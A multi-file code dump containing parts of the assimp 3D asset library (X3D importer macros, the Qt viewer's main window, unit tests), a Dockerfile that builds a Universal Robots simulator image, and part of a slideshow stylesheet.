}/* else if(mReader->getNodeType() == irr::io::EXN_ELEMENT_END) */ \
}/* while(mReader->read()) */ \
\
if(!close_found) Throw_CloseNotFound(pNodeName); \
\
} while(false)
#define MACRO_NODECHECK_METADATA(pNodeName) \
MACRO_NODECHECK_LOOPBEGIN(pNodeName) \
/* and children must be metadata nodes */ \
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported(pNodeName); \
MACRO_NODECHECK_LOOPEND(pNodeName)
/// \def MACRO_FACE_ADD_QUAD_FA(pCCW, pOut, pIn, pP1, pP2, pP3, pP4)
/// Add the points as a quad; pP1..pP4 are given in CCW order.
#define MACRO_FACE_ADD_QUAD_FA(pCCW, pOut, pIn, pP1, pP2, pP3, pP4) \
do { \
if(pCCW) \
{ \
pOut.push_back(pIn[pP1]); \
pOut.push_back(pIn[pP2]); \
pOut.push_back(pIn[pP3]); \
pOut.push_back(pIn[pP4]); \
} \
else \
{ \
pOut.push_back(pIn[pP4]); \
pOut.push_back(pIn[pP3]); \
pOut.push_back(pIn[pP2]); \
pOut.push_back(pIn[pP1]); \
} \
} while(false)
/// \def MACRO_FACE_ADD_QUAD(pCCW, pOut, pP1, pP2, pP3, pP4)
/// Add the points as a quad; pP1..pP4 are given in CCW order.
#define MACRO_FACE_ADD_QUAD(pCCW, pOut, pP1, pP2, pP3, pP4) \
do { \
if(pCCW) \
{ \
pOut.push_back(pP1); \
pOut.push_back(pP2); \
pOut.push_back(pP3); \
pOut.push_back(pP4); \
} \
else \
{ \
pOut.push_back(pP4); \
pOut.push_back(pP3); \
pOut.push_back(pP2); \
pOut.push_back(pP1); \
} \
} while(false)
#endif // X3DIMPORTER_MACRO_HPP_INCLUDED
<|start_filename|>assimp/tools/assimp_qt_viewer/mainwindow.cpp<|end_filename|>
/// \file mainwindow.cpp
/// \brief Main window and algorithms.
/// \author <EMAIL>
/// \date 2016
#include "mainwindow.hpp"
#include "ui_mainwindow.h"
// Header files, Assimp.
#include <assimp/Exporter.hpp>
#include <assimp/postprocess.h>
#ifndef __unused
#define __unused __attribute__((unused))
#endif // __unused
/**********************************/
/************ Functions ***********/
/**********************************/
/********************************************************************/
/********************* Import/Export functions **********************/
/********************************************************************/
void MainWindow::ImportFile(const QString &pFileName)
{
using namespace Assimp;
QTime time_begin = QTime::currentTime();
if(mScene != nullptr)
{
mImporter.FreeScene();
mGLView->FreeScene();
}
// Try to import scene.
mScene = mImporter.ReadFile(pFileName.toStdString(), aiProcess_Triangulate | aiProcess_GenNormals | aiProcess_ValidateDataStructure | \
aiProcess_GenUVCoords | aiProcess_TransformUVCoords | aiProcess_FlipUVs);
if(mScene != nullptr)
{
ui->lblLoadTime->setText(QString("%1").arg(time_begin.secsTo(QTime::currentTime())));
LogInfo("Import done: " + pFileName);
// Prepare widgets for new scene.
ui->leFileName->setText(pFileName.right(pFileName.length() - pFileName.lastIndexOf('/') - 1));
ui->lstLight->clear();
ui->lstCamera->clear();
ui->cbxLighting->setChecked(true); mGLView->Lighting_Enable();
ui->cbxBBox->setChecked(false); mGLView->Enable_SceneBBox(false);
ui->cbxTextures->setChecked(true); mGLView->Enable_Textures(true);
//
// Fill info labels
//
// Cameras
ui->lblCameraCount->setText(QString("%1").arg(mScene->mNumCameras));
// Lights
ui->lblLightCount->setText(QString("%1").arg(mScene->mNumLights));
// Meshes, faces, vertices.
size_t qty_face = 0;
size_t qty_vert = 0;
for(size_t idx_mesh = 0; idx_mesh < mScene->mNumMeshes; idx_mesh++)
{
qty_face += mScene->mMeshes[idx_mesh]->mNumFaces;
qty_vert += mScene->mMeshes[idx_mesh]->mNumVertices;
}
ui->lblMeshCount->setText(QString("%1").arg(mScene->mNumMeshes));
ui->lblFaceCount->setText(QString("%1").arg(qty_face));
ui->lblVertexCount->setText(QString("%1").arg(qty_vert));
// Animation
if(mScene->mNumAnimations)
ui->lblHasAnimation->setText("yes");
else
ui->lblHasAnimation->setText("no");
//
// Set scene for GL viewer.
//
mGLView->SetScene(mScene, pFileName);
// Select first camera
ui->lstCamera->setCurrentRow(0);
mGLView->Camera_Set(0);
// Scene is loaded, do first rendering.
LogInfo("Scene is ready for rendering.");
mGLView->updateGL();
}
else
{
ui->lblLoadTime->clear();
LogError(QString("Error parsing \'%1\' : \'%2\'").arg(pFileName).arg(mImporter.GetErrorString()));
}// if(mScene != nullptr)
}
/********************************************************************/
/************************ Logging functions *************************/
/********************************************************************/
void MainWindow::LogInfo(const QString& pMessage)
{
Assimp::DefaultLogger::get()->info(pMessage.toStdString());
}
void MainWindow::LogError(const QString& pMessage)
{
Assimp::DefaultLogger::get()->error(pMessage.toStdString());
}
/********************************************************************/
/*********************** Overridden functions ***********************/
/********************************************************************/
void MainWindow::mousePressEvent(QMouseEvent* pEvent)
{
if(pEvent->button() & Qt::LeftButton)
mPosition_Pressed_LMB = pEvent->pos();
else if(pEvent->button() & Qt::RightButton)
mPosition_Pressed_RMB = pEvent->pos();
}
void MainWindow::mouseMoveEvent(QMouseEvent* pEvent)
{
if(pEvent->buttons() & Qt::LeftButton)
{
GLfloat dx = 180 * GLfloat(pEvent->x() - mPosition_Pressed_LMB.x()) / mGLView->width();
GLfloat dy = 180 * GLfloat(pEvent->y() - mPosition_Pressed_LMB.y()) / mGLView->height();
if(pEvent->modifiers() & Qt::ShiftModifier)
mGLView->Camera_RotateScene(dy, 0, dx);// Rotate around the oX and oZ axes.
else
mGLView->Camera_RotateScene(dy, dx, 0);// Rotate around the oX and oY axes.
mGLView->updateGL();
mPosition_Pressed_LMB = pEvent->pos();
}
if(pEvent->buttons() & Qt::RightButton)
{
GLfloat dx = 180 * GLfloat(pEvent->x() - mPosition_Pressed_RMB.x()) / mGLView->width();
GLfloat dy = 180 * GLfloat(pEvent->y() - mPosition_Pressed_RMB.y()) / mGLView->height();
if(pEvent->modifiers() & Qt::ShiftModifier)
mGLView->Camera_Rotate(dy, 0, dx);// Rotate around the oX and oZ axes.
else
mGLView->Camera_Rotate(dy, dx, 0);// Rotate around the oX and oY axes.
mGLView->updateGL();
mPosition_Pressed_RMB = pEvent->pos();
}
}
void MainWindow::keyPressEvent(QKeyEvent* pEvent)
{
GLfloat step;
if(pEvent->modifiers() & Qt::ControlModifier)
step = 10;
else if(pEvent->modifiers() & Qt::AltModifier)
step = 100;
else
step = 1;
if(pEvent->key() == Qt::Key_A)
mGLView->Camera_Translate(-step, 0, 0);
else if(pEvent->key() == Qt::Key_D)
mGLView->Camera_Translate(step, 0, 0);
else if(pEvent->key() == Qt::Key_W)
mGLView->Camera_Translate(0, step, 0);
else if(pEvent->key() == Qt::Key_S)
mGLView->Camera_Translate(0, -step, 0);
else if(pEvent->key() == Qt::Key_Up)
mGLView->Camera_Translate(0, 0, -step);
else if(pEvent->key() == Qt::Key_Down)
mGLView->Camera_Translate(0, 0, step);
mGLView->updateGL();
}
/********************************************************************/
/********************** Constructor/Destructor **********************/
/********************************************************************/
MainWindow::MainWindow(QWidget *parent)
: QMainWindow(parent), ui(new Ui::MainWindow),
mScene(nullptr)
{
using namespace Assimp;
ui->setupUi(this);
// Create OpenGL widget
mGLView = new CGLView(this);
mGLView->setMinimumSize(800, 600);
mGLView->setSizePolicy(QSizePolicy::Expanding, QSizePolicy::MinimumExpanding);
mGLView->setFocusPolicy(Qt::StrongFocus);
// Connect to GLView signals.
connect(mGLView, SIGNAL(Paint_Finished(size_t, GLfloat)), SLOT(Paint_Finished(size_t, GLfloat)));
connect(mGLView, SIGNAL(SceneObject_Camera(QString)), SLOT(SceneObject_Camera(QString)));
connect(mGLView, SIGNAL(SceneObject_LightSource(QString)), SLOT(SceneObject_LightSource(QString)));
// and add it to layout
ui->hlMainView->insertWidget(0, mGLView, 4);
// Create logger
mLoggerView = new CLoggerView(ui->tbLog);
DefaultLogger::create("", Logger::VERBOSE);
DefaultLogger::get()->attachStream(mLoggerView, DefaultLogger::Debugging | DefaultLogger::Info | DefaultLogger::Err | DefaultLogger::Warn);
}
MainWindow::~MainWindow()
{
using namespace Assimp;
DefaultLogger::get()->detatchStream(mLoggerView, DefaultLogger::Debugging | DefaultLogger::Info | DefaultLogger::Err | DefaultLogger::Warn);
DefaultLogger::kill();
if(mScene != nullptr) mImporter.FreeScene();
if(mLoggerView != nullptr) delete mLoggerView;
if(mGLView != nullptr) delete mGLView;
delete ui;
}
/********************************************************************/
/****************************** Slots *******************************/
/********************************************************************/
void MainWindow::Paint_Finished(const size_t pPaintTime_ms, const GLfloat pDistance)
{
ui->lblRenderTime->setText(QString("%1").arg(pPaintTime_ms));
ui->lblDistance->setText(QString("%1").arg(pDistance));
}
void MainWindow::SceneObject_Camera(const QString& pName)
{
ui->lstCamera->addItem(pName);
}
void MainWindow::SceneObject_LightSource(const QString& pName)
{
ui->lstLight->addItem(pName);
// After an item is added, "currentRow" still contains the old value (even '-1' if this is the first item). "currentRow"/"currentItem" are changed by user interaction,
// not by "addItem", so "currentRow" must be set manually.
ui->lstLight->setCurrentRow(ui->lstLight->count() - 1);
// After that, the "itemSelectionChanged" signal handler triggered by "selectAll" will see the correct "currentItem" and "currentRow" values.
ui->lstLight->selectAll();
}
void MainWindow::on_butOpenFile_clicked()
{
aiString filter_temp;
QString filename, filter;
mImporter.GetExtensionList(filter_temp);
filter = filter_temp.C_Str();
filter.replace(';', ' ');
filter.append(" ;; All (*.*)");
filename = QFileDialog::getOpenFileName(this, "Choose the file", "", filter);
if(!filename.isEmpty()) ImportFile(filename);
}
void MainWindow::on_butExport_clicked()
{
using namespace Assimp;
QString filename, filter, format_id;
Exporter exporter;
QTime time_begin;
aiReturn rv;
if(mScene == nullptr)
{
QMessageBox::critical(this, "Export error", "Scene is empty");
return;
}
// build filter
{
aiString filter_temp;
mImporter.GetExtensionList(filter_temp);
filter = filter_temp.C_Str();
filter.replace(';', ' ');
}
// get file path
filename = QFileDialog::getSaveFileName(this, "Set file name", "", filter);
// extract format ID
format_id = filename.right(filename.length() - filename.lastIndexOf('.') - 1);
if(format_id.isEmpty())
{
QMessageBox::critical(this, "Export error", "File name must has extension.");
return;
}
// begin export
time_begin = QTime::currentTime();
rv = exporter.Export(mScene, format_id.toLocal8Bit(), filename.toLocal8Bit());
ui->lblExportTime->setText(QString("%1").arg(time_begin.secsTo(QTime::currentTime())));
if(rv == aiReturn_SUCCESS)
LogInfo("Export done: " + filename);
else
LogError("Export failed: " + filename);
}
void MainWindow::on_cbxLighting_clicked(bool pChecked)
{
if(pChecked)
mGLView->Lighting_Enable();
else
mGLView->Lighting_Disable();
mGLView->updateGL();
}
void MainWindow::on_lstLight_itemSelectionChanged()
{
bool selected = ui->lstLight->isItemSelected(ui->lstLight->currentItem());
if(selected)
mGLView->Lighting_EnableSource(ui->lstLight->currentRow());
else
mGLView->Lighting_DisableSource(ui->lstLight->currentRow());
mGLView->updateGL();
}
void MainWindow::on_lstCamera_clicked( const QModelIndex &)
{
mGLView->Camera_Set(ui->lstCamera->currentRow());
mGLView->updateGL();
}
void MainWindow::on_cbxBBox_clicked(bool checked)
{
mGLView->Enable_SceneBBox(checked);
mGLView->updateGL();
}
void MainWindow::on_cbxTextures_clicked(bool checked)
{
mGLView->Enable_Textures(checked);
mGLView->updateGL();
}
<|start_filename|>assimp/test/unit/utFindInvalidData.cpp<|end_filename|>
/*
---------------------------------------------------------------------------
Open Asset Import Library (assimp)
---------------------------------------------------------------------------
Copyright (c) 2006-2016, assimp team
All rights reserved.
Redistribution and use of this software in source and binary forms,
with or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the
following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other
materials provided with the distribution.
* Neither the name of the assimp team, nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior
written permission of the assimp team.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
---------------------------------------------------------------------------
*/
#include "UnitTestPCH.h"
#include <FindInvalidDataProcess.h>
#include "../../include/assimp/mesh.h"
using namespace std;
using namespace Assimp;
class FindInvalidDataProcessTest : public ::testing::Test
{
public:
virtual void SetUp();
virtual void TearDown();
protected:
aiMesh* pcMesh;
FindInvalidDataProcess* piProcess;
};
// ------------------------------------------------------------------------------------------------
void FindInvalidDataProcessTest::SetUp()
{
ASSERT_TRUE( AI_MAX_NUMBER_OF_TEXTURECOORDS >= 3);
piProcess = new FindInvalidDataProcess();
pcMesh = new aiMesh();
pcMesh->mNumVertices = 1000;
pcMesh->mVertices = new aiVector3D[1000];
for (unsigned int i = 0; i < 1000;++i)
pcMesh->mVertices[i] = aiVector3D((float)i);
pcMesh->mNormals = new aiVector3D[1000];
for (unsigned int i = 0; i < 1000;++i)
pcMesh->mNormals[i] = aiVector3D((float)i+1);
pcMesh->mTangents = new aiVector3D[1000];
for (unsigned int i = 0; i < 1000;++i)
pcMesh->mTangents[i] = aiVector3D((float)i);
pcMesh->mBitangents = new aiVector3D[1000];
for (unsigned int i = 0; i < 1000;++i)
pcMesh->mBitangents[i] = aiVector3D((float)i);
for (unsigned int a = 0; a < AI_MAX_NUMBER_OF_TEXTURECOORDS;++a)
{
pcMesh->mTextureCoords[a] = new aiVector3D[1000];
for (unsigned int i = 0; i < 1000;++i)
pcMesh->mTextureCoords[a][i] = aiVector3D((float)i);
}
}
// ------------------------------------------------------------------------------------------------
void FindInvalidDataProcessTest::TearDown()
{
delete piProcess;
delete pcMesh;
}
// ------------------------------------------------------------------------------------------------
TEST_F(FindInvalidDataProcessTest, testStepNegativeResult)
{
::memset(pcMesh->mNormals,0,pcMesh->mNumVertices*sizeof(aiVector3D));
::memset(pcMesh->mBitangents,0,pcMesh->mNumVertices*sizeof(aiVector3D));
pcMesh->mTextureCoords[2][455] = aiVector3D( std::numeric_limits<float>::quiet_NaN() );
piProcess->ProcessMesh(pcMesh);
EXPECT_TRUE(NULL != pcMesh->mVertices);
EXPECT_TRUE(NULL == pcMesh->mNormals);
EXPECT_TRUE(NULL == pcMesh->mTangents);
EXPECT_TRUE(NULL == pcMesh->mBitangents);
for (unsigned int i = 0; i < 2;++i)
EXPECT_TRUE(NULL != pcMesh->mTextureCoords[i]);
for (unsigned int i = 2; i < AI_MAX_NUMBER_OF_TEXTURECOORDS;++i)
EXPECT_TRUE(NULL == pcMesh->mTextureCoords[i]);
}
// ------------------------------------------------------------------------------------------------
TEST_F(FindInvalidDataProcessTest, testStepPositiveResult)
{
piProcess->ProcessMesh(pcMesh);
EXPECT_TRUE(NULL != pcMesh->mVertices);
EXPECT_TRUE(NULL != pcMesh->mNormals);
EXPECT_TRUE(NULL != pcMesh->mTangents);
EXPECT_TRUE(NULL != pcMesh->mBitangents);
for (unsigned int i = 0; i < AI_MAX_NUMBER_OF_TEXTURECOORDS;++i)
EXPECT_TRUE(NULL != pcMesh->mTextureCoords[i]);
}
<|start_filename|>assimp/test/unit/utIOStreamBuffer.cpp<|end_filename|>
/*
---------------------------------------------------------------------------
Open Asset Import Library (assimp)
---------------------------------------------------------------------------
Copyright (c) 2006-2016, assimp team
All rights reserved.
Redistribution and use of this software in source and binary forms,
with or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the
following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other
materials provided with the distribution.
* Neither the name of the assimp team, nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior
written permission of the assimp team.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
---------------------------------------------------------------------------
*/
#include "UnitTestPCH.h"
#include "IOStreamBuffer.h"
#include "TestIOStream.h"
class IOStreamBufferTest : public ::testing::Test {
// empty
};
using namespace Assimp;
TEST_F( IOStreamBufferTest, creationTest ) {
bool ok( true );
try {
IOStreamBuffer<char> myBuffer;
} catch ( ... ) {
ok = false;
}
EXPECT_TRUE( ok );
}
TEST_F( IOStreamBufferTest, accessCacheSizeTest ) {
IOStreamBuffer<char> myBuffer1;
EXPECT_NE( 0U, myBuffer1.cacheSize() );
IOStreamBuffer<char> myBuffer2( 100 );
EXPECT_EQ( 100U, myBuffer2.cacheSize() );
}
TEST_F( IOStreamBufferTest, open_close_Test ) {
IOStreamBuffer<char> myBuffer;
EXPECT_FALSE( myBuffer.open( nullptr ) );
EXPECT_FALSE( myBuffer.close() );
char buffer[ L_tmpnam ];
tmpnam( buffer );
std::FILE *fs( std::fopen( buffer, "w+" ) );
size_t written( std::fwrite( buffer, 1, sizeof( char ) * L_tmpnam, fs ) );
EXPECT_NE( 0U, written );
std::fflush( fs );
TestDefaultIOStream myStream( fs, buffer );
EXPECT_TRUE( myBuffer.open( &myStream ) );
EXPECT_FALSE( myBuffer.open( &myStream ) );
EXPECT_TRUE( myBuffer.close() );
}
TEST_F( IOStreamBufferTest, readlineTest ) {
char buffer[ L_tmpnam ];
tmpnam( buffer );
std::FILE *fs( std::fopen( buffer, "w+" ) );
size_t written( std::fwrite( buffer, 1, sizeof( char ) * L_tmpnam, fs ) );
EXPECT_NE( 0U, written );
std::fflush( fs );
IOStreamBuffer<char> myBuffer( 26 );
EXPECT_EQ( 26U, myBuffer.cacheSize() );
TestDefaultIOStream myStream( fs, buffer );
size_t size( myStream.FileSize() );
size_t numBlocks( size / myBuffer.cacheSize() );
if ( size % myBuffer.cacheSize() > 0 ) {
numBlocks++;
}
EXPECT_TRUE( myBuffer.open( &myStream ) );
EXPECT_EQ( numBlocks, myBuffer.getNumBlocks() );
EXPECT_TRUE( myBuffer.close() );
}
TEST_F( IOStreamBufferTest, accessBlockIndexTest ) {
}
<|start_filename|>assimp/test/unit/utBlendImportAreaLight.cpp<|end_filename|>
/*
---------------------------------------------------------------------------
Open Asset Import Library (assimp)
---------------------------------------------------------------------------
Copyright (c) 2006-2016, assimp team
All rights reserved.
Redistribution and use of this software in source and binary forms,
with or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the
following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other
materials provided with the distribution.
* Neither the name of the assimp team, nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior
written permission of the assimp team.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
---------------------------------------------------------------------------
*/
#include "UnitTestPCH.h"
#include <assimp/cexport.h>
#include <assimp/Exporter.hpp>
#include <assimp/Importer.hpp>
#include <assimp/scene.h>
class BlendImportAreaLight : public ::testing::Test {
public:
virtual void SetUp()
{
im = new Assimp::Importer();
}
virtual void TearDown()
{
delete im;
}
protected:
Assimp::Importer* im;
};
// ------------------------------------------------------------------------------------------------
TEST_F(BlendImportAreaLight, testImportLight)
{
const aiScene* pTest = im->ReadFile(ASSIMP_TEST_MODELS_DIR "/BLEND/AreaLight_269.blend",0);
ASSERT_TRUE(pTest != NULL);
ASSERT_TRUE(pTest->HasLights());
std::vector< std::pair<std::string, size_t> > lightNames;
for (size_t i = 0; i < pTest->mNumLights; i++) {
lightNames.push_back(std::make_pair(pTest->mLights[i]->mName.C_Str(), i));
}
std::sort(lightNames.begin(), lightNames.end());
std::vector<aiLight> lights;
for (size_t i = 0; i < pTest->mNumLights; ++i) {
lights.push_back(*pTest->mLights[lightNames[i].second]);
}
ASSERT_STREQ(lights[0].mName.C_Str(), "Bar");
ASSERT_STREQ(lights[1].mName.C_Str(), "Baz");
ASSERT_STREQ(lights[2].mName.C_Str(), "Foo");
ASSERT_EQ(lights[0].mType, aiLightSource_AREA);
ASSERT_EQ(lights[1].mType, aiLightSource_POINT);
ASSERT_EQ(lights[2].mType, aiLightSource_AREA);
EXPECT_FLOAT_EQ(lights[0].mSize.x, 0.5f);
EXPECT_FLOAT_EQ(lights[0].mSize.y, 2.0f);
EXPECT_FLOAT_EQ(lights[2].mSize.x, 1.0f);
EXPECT_FLOAT_EQ(lights[2].mSize.y, 1.0f);
EXPECT_FLOAT_EQ(lights[0].mColorDiffuse.r, 42.0f);
EXPECT_FLOAT_EQ(lights[0].mColorDiffuse.g, 42.0f);
EXPECT_FLOAT_EQ(lights[0].mColorDiffuse.b, 42.0f);
EXPECT_FLOAT_EQ(lights[2].mColorDiffuse.r, 1.0f);
EXPECT_FLOAT_EQ(lights[2].mColorDiffuse.g, 1.0f);
EXPECT_FLOAT_EQ(lights[2].mColorDiffuse.b, 1.0f);
EXPECT_FLOAT_EQ(lights[0].mDirection.x, 0.0f);
EXPECT_FLOAT_EQ(lights[0].mDirection.y, 0.0f);
EXPECT_FLOAT_EQ(lights[0].mDirection.z, -1.0f);
EXPECT_FLOAT_EQ(lights[2].mDirection.x, 0.0f);
EXPECT_FLOAT_EQ(lights[2].mDirection.y, 0.0f);
EXPECT_FLOAT_EQ(lights[2].mDirection.z, -1.0f);
}
| forifelse/fispTools |
<|start_filename|>ur_robot_driver/resources/ursim_driver/ursim/g5/Dockerfile<|end_filename|>
# MIT License
#
# Original from https://github.com/ahobsonsayers/DockURSim
# Copyright (c) 2019 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
FROM ubuntu:latest
# Set Version Information
ARG VERSION
ARG URSIM
LABEL build_version="URSim Version: ${VERSION}"
LABEL description="UR simulator e-series"
# Set Timezone
ENV TZ "Europe/Copenhagen"
# Set Home Directory
ENV HOME /ursim
# Set robot model - Can be UR3, UR5 or UR10
ENV ROBOT_MODEL UR5
# Set display
ENV DISPLAY :1
RUN \
echo "**** Installing Dependencies ****" && \
apt-get update && \
apt-get install -qy --no-install-recommends openjdk-8-jre psmisc && \
apt-get -y install curl && \
apt-get install -y x11vnc xvfb && \
# Change java alternatives so we use openjdk8 (required by URSim)
update-alternatives --install /usr/bin/java java /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java 10000
# Setup JAVA_HOME
ENV JAVA_HOME /usr/lib/jvm/java-8-openjdk-amd64
RUN \
echo "**** Downloading URSim ****" && \
# Download URSim Linux tar.gz
curl ${URSIM} -o URSim-Linux.tar.gz && \
# Extract tarball
tar xvzf URSim-Linux.tar.gz && \
# Remove the tarball
rm URSim-Linux.tar.gz && \
# Rename the URSim folder to just ursim
mv /ursim* /ursim
RUN \
echo "**** Installing URSim ****" && \
# cd to ursim folder
cd /ursim && \
# Stop install of unnecessary packages and install required ones quietly
sed -i 's|apt-get -y install|apt-get -qy install --no-install-recommends|g' ./install.sh && \
# Skip xterm command. We don't have a desktop
sed -i 's|tty -s|(exit 0)|g' install.sh && \
# Skip the Java version check as the correct version is already installed and the check would fail
sed -i 's|needToInstallJava$|(exit 0)|g' install.sh && \
# Skip install of desktop shortcuts - we don't have a desktop
sed -i '/for TYPE in UR3 UR5 UR10/,$ d' ./install.sh && \
# Replace libcurl3 with libcurl4 else the installation will fail
sed -i 's/libcurl3/libcurl4/g' ./install.sh && \
# Remove commands that are not relevant on docker as we are root user
sed -i 's|pkexec ||g' ./install.sh && \
sed -i 's|sudo ||g' ./install.sh && \
sed -i 's|sudo ||g' ./ursim-certificate-check.sh && \
#
# Install URSim
./install.sh && \
#
echo "Installed URSim"
ENV PATH "$PATH:/ursim/usr/bin"
RUN \
echo "**** Clean Up ****" && \
rm -rf \
/tmp/* \
/var/lib/apt/lists/* \
/var/tmp/*
# Copy entrypoint script
COPY g5/entrypoint.sh /entrypoint.sh
RUN chmod +x /entrypoint.sh
# VNC viewer
EXPOSE 5900
# Modbus Port
EXPOSE 502
# Interface Ports
EXPOSE 29999
EXPOSE 30001-30004
# Install the ExternalControl URCap
ADD ./aux/externalcontrol-1.0.5.urcap /ursim/GUI/bundle/com.fzi.externalcontrol-1.0.5.jar
# This will start the simulator
ENTRYPOINT ["/entrypoint.sh"]
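# Illustrative usage sketch (not part of this Dockerfile): with the build context set to the
# ursim/ directory (so that the g5/ and aux/ paths above resolve), the image could be built
# and run roughly as follows. The URSIM download URL, version and image tag are placeholders.
#
#   docker build -f g5/Dockerfile \
#     --build-arg VERSION=5.x.y \
#     --build-arg URSIM=https://example.com/URSim_Linux-5.x.y.tar.gz \
#     -t ursim:5.x.y .
#   docker run --rm -p 5900:5900 -p 502:502 -p 29999:29999 -p 30001-30004:30001-30004 ursim:5.x.y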
| shonigmann/Universal_Robots_ROS2_Driver |
<|start_filename|>bower_components/slick/examples/css/style.css<|end_filename|>
.slick {
width: 500px;
position: relative;
background: #0F0F0F;
font-family: Calibri, Candara, Arial, sans-serif;
box-shadow: 0px 0px 2px 2px #aaa; }
.slick .slick-content {
width: inherit;
text-align: center; }
.slick .slick-content img {
width: inherit; }
.slick .slick-bottom {
height: 30px;
width: inherit;
color: #DDD;
background: #0F0F0F;
line-height: 21px; }
.slick .slick-bottom .slick-controls {
padding-top: 5px; }
.slick .slick-bottom .slick-controls img {
width: 20px;
margin-left: 5px;
opacity: 0.7;
-webkit-transition: opacity 0.2s ease-in-out;
-moz-transition: opacity 0.2s ease-in-out;
-ms-transition: opacity 0.2s ease-in-out;
-o-transition: opacity 0.2s ease-in-out;
transition: opacity 0.2s ease-in-out; }
.slick .slick-bottom .slick-controls img:hover {
opacity: 1;
-webkit-transition: opacity 0.2s ease-in-out;
-moz-transition: opacity 0.2s ease-in-out;
-ms-transition: opacity 0.2s ease-in-out;
-o-transition: opacity 0.2s ease-in-out;
transition: opacity 0.2s ease-in-out; }
.slick .slick-bottom .slick-no {
float: right;
padding-right: 10px;
position: relative;
padding-top: 5px; }
.slick .slick-bottom .slick-no .skip {
width: 16px;
text-align: right;
height: 20px;
margin-right: 3px;
padding: 1px 2px 0px 0px;
border: 1px solid #666;
background: #1E1E1E;
color: #DDD;
position: absolute;
left: -20px;
top: 5px;
-webkit-transition: all 0.2s ease-in-out;
-moz-transition: all 0.2s ease-in-out;
-ms-transition: all 0.2s ease-in-out;
